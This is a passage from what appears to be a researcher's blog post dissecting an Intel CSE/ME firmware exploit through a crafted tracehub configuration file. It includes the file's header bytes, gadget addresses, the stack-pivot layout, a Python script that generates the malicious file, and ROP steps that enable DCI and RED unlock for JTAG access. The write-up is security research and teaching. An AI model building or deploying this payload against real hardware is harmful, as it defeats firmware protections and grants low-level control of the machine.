The only things that can be controlled of our return value though are bits 0, 1, 6, 7, 8 and 9. Bits 0 and 1 are always set to 1, bits 6, 7 and 8 are dependent on a value stored in segment 0xBF at offset 0x10, and bit 9 is dependent on a vale stored in segment 0xBF at offset 0xE0. Thankfully both those values in segment 0xBF can be set through the tracehub configuration file header (the loop at the end of bup_init_trace_hub ).

The ct file header has this format :

struct { uint8_t ignore[6]; uint16_t num_entries; struct { uint24_t offset; // offset in the segement is only 20 bits uint8_t segment_selector; // if value is 1, segment is 0x07, if value is 2, segment is 0xBF uint32_t value; // Value to set in segment_selector:offset }[num_entries]; };

With the ct file header being set by the exploit to :

00 00 00 00 00 00 02 00 e0 00 00 02 00 00 00 5f 10 00 00 02 88 08 00 00 00 00 00 00 00 00 00 00

We can see it has 2 entries, which sets 0xBF:E0 to 0x5F000000 and 0xBF:10 to 0x000888

With those values set, the bup_init_trace_hub_set_systracer function that gets called in bup_init_trace_hub will overwrite its own return address at offset 0x55C58 from 0x4995B to 0x49BDB which makes it jump in the middle of sub_49BB6 with the stack/ebp of bup_init_trace_hub , such that when that function returns, it will return to the address stored in the retaddr offset of bup_init_trace_hub which is 0x55FB8. Note that the function sub_49BB6 does not check the stack for the security cookie and the point where we jump into that function makes it call a few functions that just return with an error because their parameters are wrong, so it doesn’t seem to do anything.

That address 0x55FB8 that contains the retaddr is at position 0x338 in the ct file (0x56000 – 0x55FB8 = 0x48 bytes from the end of the file of size 0x380) which contains :

1a 6e 01 00 98 5c 05 00

The address 0x16e1a is in the middle of an actual instruction but it will itself be interpreted as the instruction pop esp followed by a ret . This pops the next value 0x55c98 into the stack pointer and returns to it. If you remember, I said the ct buffer is saved into 0x55C80 (which you can also see from the stack analysis above), so address 0x55C98 is at offset 0x18 in the CT file (which is right after the header and those 2 entries that set values in segment 0xBF) which is where we find the actual ROP gadgets which enable DCI, set red unlock then enter an infinite loop.

If we look back at the python script that generates the CT file for the exploit, we can now understand everything it does :

STACK_BASE = 0x00056000 BUFFER_OFFSET = 0x380 SYS_TRACER_CTX_OFFSET = 0x200 SYS_TRACER_CTX_REQ_OFFSET = 0x55c58 RET_ADDR_OFFSET = 0x338 def GenerateTHConfig(): print("[*] Generating fake tracehub configuration...") trace_hub_config = struct.pack("<B", 0x0)*6 trace_hub_config += struct.pack("<H", 0x2) trace_hub_config += struct.pack("<L", 0x020000e0) trace_hub_config += struct.pack("<L", 0x5f000000) trace_hub_config += struct.pack("<L", 0x02000010) trace_hub_config += struct.pack("<L", 0x00000888) def GenerateRops(): print("[*] Generating rops...") # Let's ignore this for now def GenerateShellCode(): syslib_ctx_start = SYS_TRACER_CTX_REQ_OFFSET - SYS_TRACER_CTX_OFFSET data = GenerateTHConfig() init_trace_len = len(data) data += GenerateRops() data += struct.pack("<B", 0x0)*(RET_ADDR_OFFSET - len(data)) data += struct.pack("<L", 0x00016e1a) data += struct.pack("<L", STACK_BASE - BUFFER_OFFSET + init_trace_len) data_tail = struct.pack("<LLLLL", 0, syslib_ctx_start, 0, 0x03000300, STACK_BASE-4) data += struct.pack("<B", 0x0)*(BUFFER_OFFSET - len(data) - len(data_tail)) data += data_tail return data

The only remaining magic number is in that data_tail variable, which is the TLS structure. The 0x03000300 value is simply the thread ID.

Rops

The latest version of the exploit which adds CPU bring up will simply add the ROP gadgets needed to continue the bup initialization just as it would have, right after the bup_init_trace_hub returned (by resetting the syslib context to the right value then restoring the stack and registers then returning into the bup_run_scripts ).

The ROPs are quite simple, they do two things : First, they enable the DCI interface, then they set the DfX Aggregator personality to 3 (which enabled RED Unlock for JTAG) then enter an infinite loop.

// Enable DCI side_band_mapping(0x706a8, 0x100); put_sel_word(0x19F, 0, 0x1010); // Sets 0x19F:0 to 0x1010 // Set DfX-agg personality side_band_mapping(0x70684, 0x100); put_sel_word(0x19F, 0x8400, 3); // Sets 0x19F:8400 to 3 loop();

I wondered for a long time “what is that sideband mapping” and “what are those 0x706a8 and 0x70684 values”. I will explain these in the next blog post (in the next couple of days) but in summary, it causes segment 0x19F to be mapped to the DCI and DfX Aggregator devices’ Private Configuration Registers (PCRs). So first, you map segment 0x19F to the DCI device’s PCR, then you enable DCI by setting the flags to 1, then you map segment 0x19F to the DfX-agg device then set the personality register in its PCR at offset 0x8400 to 3 (red).

With just those two values set, you have DCI enabled and Red Unlock enabled, and the exploit is working. Congratulations, you can now play around with your CSE device via JTAG.

Conclusion

The CT file has 4 things :

Header: which sets the various values in segment 0xBF for the systracer to work

Big ROPs: which execute the custom code we want to enable DCI and RED unlock

Small ROPs: Smaller header at offset 0x338 which does a pop esp; ret to return us to the first bigger ROP

to return us to the first bigger ROP TLS: The modified TLS header which points the syslib context to 0x55A58 so the systracer offset points to the return address of the function that sets it.

The new TLS has a new syslib context which points the systracer offset to the return address of the bup_init_trace_hub_set_systracer function that modifies it using the values in the ct file header in order to jump to offset 0x49BDB in sub_49BB6 so that when that function returns, it will jump to the small ROP which will replace ESP with the address of the Big ROPs then execute them, which then enables DCI and JTAG and loops forever or continues the bup init process depending on the version of the exploit used.

Yeah.. that was a lot of fun to figure out. So you see that this exploit is not entirely the same as the skylake exploit. The skylake exploit is actually quite a lot more difficult to achieve because it involves more moving parts. I assume that’s the reason why PT hadn’t released that.

In the next post I write, I will explain how I ported this exploit to ME 11.x using the information provided by Positive Technologies and I will explain how to port your own ME version to it using what I wrote as a base.

Thanks for reading!